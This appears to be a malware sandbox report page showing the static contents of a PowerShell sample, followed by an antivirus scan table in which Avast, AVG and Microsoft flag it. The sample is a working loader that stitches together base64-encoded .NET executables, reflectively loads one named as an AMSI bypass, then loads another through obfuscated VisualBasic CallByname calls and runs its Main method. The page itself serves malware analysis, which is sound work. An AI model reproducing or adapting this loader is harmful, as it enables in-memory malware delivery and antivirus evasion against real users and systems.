Static | ZeroBOX

$dook="IgAAAEAAC4LSwaBAHAAjAAAAQAAUAtLBoEAcQCQAAABAAByC0sGhQByAJQAAAEAAJQLSwaBAHIAlQAAAQAAtgtLBoEAcwCZAAABAADYC0sGgQB0AJ0AAAEAAPoLSwaBAHUAoQAAAQAAHAxLBoEAdgClAAABAAA+DEsGgQB3AKkAAAEAAGAMSwaBAHgArQAAAQAAggxLBoEAeQCxAAABAACkDEsGgQB6ALUAAAEAAMYMSwaBAHsAuQAAAQAA6AxLBoEAfAC9AAABAAAKDUsGgQB9AMEAAAEAACwNSwaBAH4AxQAAAQAATg1LBoEAfwDJAAABAABwDUsGgQCAAM0AAAEAAJINSwaBAIEA0QAAAQAAtA1LBoEAggDVAAABAADWDUsGgQCDANkAAAEAAPgNSwaBAIQA3QAAAQAAGg5LBoUAhQDhAAABAAA8DksGgQCFAOIAAAEAAF4OSwaBAIYA5gAAAQAAgA5LBoUAhwDqAAABAACiDksGgQCIAOsAAAEAAMQOSwaFAIkA7wAAAQAA5g5LBoEAiQDwAAABAAAID0sGgQCKAPQAAAEAACoPSwaBAIsA+AAAAQAATA9LBoEAjAD8AAABAABuD0sGgQCNAAABAAEAAJAPSwaBAI4ABAEAAQAAsg9LBoEAjwAIAQABAADUD0sGgQCQAAwBAAEAAPYPSwaBAJEAEAERAB8QDgARAEEQDgARALUQJQARANcQKgARACsRPwAxAEcRSAAzAfERXgAzARMSYgAzAJsSDgAjAL0SeQAjAN8SeQAzAJsSDgAjAL0SeQAxAM0TnAAxAO8TeQAxABEUeQAxADMUnwAxAFUUnwAxAL0SowAxAL0SeQAxAN8SeQAxAP8UeQAxACEVeQAxAEMVeQAxAGUVeQAxAIcVeQAxAKkVeQAxAMsVeQAxAO0VeQAxAA8WeQAxADEWeQAxAFMWeQAxAHUWeQAxAJcWeQAxALkWeQAxANsWeQAxAP0WeQAxAB8XeQAxAEEXeQAxAGMXeQAxAI

$book="FtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAIr/mGMAAAAAAAAAAOAALiALATAAAHQAAAB4AAAAAAAAfpIAAAAgAAAAoAAAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAADgAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAACSSAABXAAAAAMAAAGQDAAAAAAAAAAAAAAAAAAAAAAAAAKAAAAwAAADoRQAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAhHIAAAAgAAAAdAAAAAIAAAAAAAAAAAAAAAAAACAAAGAucmVsb2MAAAwAAAAAoAAAAAIAAAB2AAAAAAAAAAAAAAAAAABAAABCLnJzcmMAAABkAwAAAMAAAAAEAAAAeAAAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAABgkgAAAAAAAEgAAAACAAUAYEYAAMRLAAABAAAAAAAAABg+AADQBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACIAKBEAAAYAKgAAAAMwCQAIAAAAAAAAAAIoIwAACgAqAzAJADsAAAAAAAAAHxQoGwAABih/AAAGJSYl0AcAAAQo5QAABoABAAAEHxgoGwAABih/AAAGJdAIAAAEKOUAAAaAAgAABCoAEzADADgAAAABAAARACgGAAAGJSYKBiwgGkUBAAAA9v///xctBtAEAAAGJn4BAAAEKAUAAAYAKwt+AgAABCgFAAAGACobMAUAwwAAAAIAABEAABcoIgAABiUmChwoIgAABgsfCygiAAAGDAYHCCikAAAGJSYoFwAABiUmDR8UKCIAAAYTBB8ZKCIAAAYlJhMFHyYoIgAABiUmEwY

$hook="{end}T{end}{end}VqQAAMAAAA{end}EAAAA/{end}/8AALgAAAAA{end}AAAAQAAAAAAAAAAAAAAA{end}AAAAAAAAAAAAAAAAAAAAAAA{end}AAAAAAAAAgAAAAA4f{end}ug4AtAnNIbgBTM0hVGhpcyBwcm9ncm"

$hook=($hook).replace('{end}', '')

$took=$hook+$book+$dook

$jook =@($took)

function Hook-AMSI

if(-not ([System.Management.Automation.PSTypeName]"Hook").Type) { [Reflection.Assembly]::Load([Convert]::FromBase64String($jook)) |

Out-Null;

[Hook]::Now()

IEX Hook-AMSI

[void] [System.Reflection.Assembly]::LoadWithPartialName("Microsoft.VisualBasic")

$ytr="TV"

$iy="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAPz2L2QAAAAAAAAAAOAALgALATAAAEwAAABSAAAAAAAAwmsAAAAgAAAAgAAAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAADAAAAAAgAAAAAAAAIAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAGhrAABXAAAAAKAAAKgFAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAwAAAD4NQAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAyEsAAAAgAAAATAAAAAIAAAAAAAAAAAAAAAAAACAAAGAucmVsb2MAAAwAAAAAgAAAAAIAAABOAAAAAAAAAAAAAAAAAABAAABCLnJzcmMAAACoBQAAAKAAAAAGAAAAUAAAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAACkawAAAAAAAEgAAAACAAUAcDYAAPg0AAABAAAACQAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABMwAwBnAAAAAAAAAB8aKA8AAAolJoABAAAEclsAAHCAAgAABCABAACAKBAAAAolJoADAAAEIAIAAIAoEAAACiUmgAQAAAQXgAUAAAQYgAYAAAQagAcAAAQegAgAAAQgAAEAAIAJAAAEIAACAACACgAABCoAAzAJACkAAAAAAAAAcrkAAHAoEQAACnLZAABwKBEAAApyrgEAcCgRAAAKcs8CAHAoEQAACioAAAATM

$iu=$ytr+$iy

$obj =@($iu)

$t=[system.Convert]

$dd=$t.GetMethod("FromBase64String")

$hgh=$dd.Invoke($null,$obj)

$ui80 = [Microsoft.VisualBasic.Interaction]::CallByname([AppDomain]::CurrentDomain,"Load",[Microsoft.VisualBasic.CallType]::Method,$hgh)

[AUTORUNNN.Program]::Main()

Antivirus	Signature
Bkav	Clean
Lionic	Clean
ClamAV	Clean
CMC	Clean
CAT-QuickHeal	Clean
ALYac	Clean
Malwarebytes	Clean
VIPRE	Clean
Sangfor	Clean
K7AntiVirus	Clean
K7GW	Clean
BitDefenderTheta	Clean
VirIT	Clean
Cyren	Clean
Symantec	Clean
ESET-NOD32	Clean
TrendMicro-HouseCall	Clean
Avast	Script:SNH-gen [Drp]
Cynet	Clean
Kaspersky	Clean
BitDefender	Clean
NANO-Antivirus	Clean
ViRobot	Clean
MicroWorld-eScan	Clean
Rising	Clean
Sophos	Clean
Baidu	Clean
F-Secure	Clean
DrWeb	Clean
Zillya	Clean
TrendMicro	Clean
McAfee-GW-Edition	Clean
FireEye	Clean
Emsisoft	Clean
Ikarus	Clean
GData	Clean
Jiangmin	Clean
Avira	Clean
Antiy-AVL	Clean
Gridinsoft	Clean
Xcitium	Clean
Arcabit	Clean
SUPERAntiSpyware	Clean
ZoneAlarm	Clean
Microsoft	Trojan:Win32/Casdet!rfn
Google	Clean
AhnLab-V3	Clean
Acronis	Clean
McAfee	Clean
MAX	Clean
VBA32	Clean
Zoner	Clean
Tencent	Clean
Yandex	Clean
TACHYON	Clean
MaxSecure	Clean
Fortinet	Clean
AVG	Script:SNH-gen [Drp]
Panda	Clean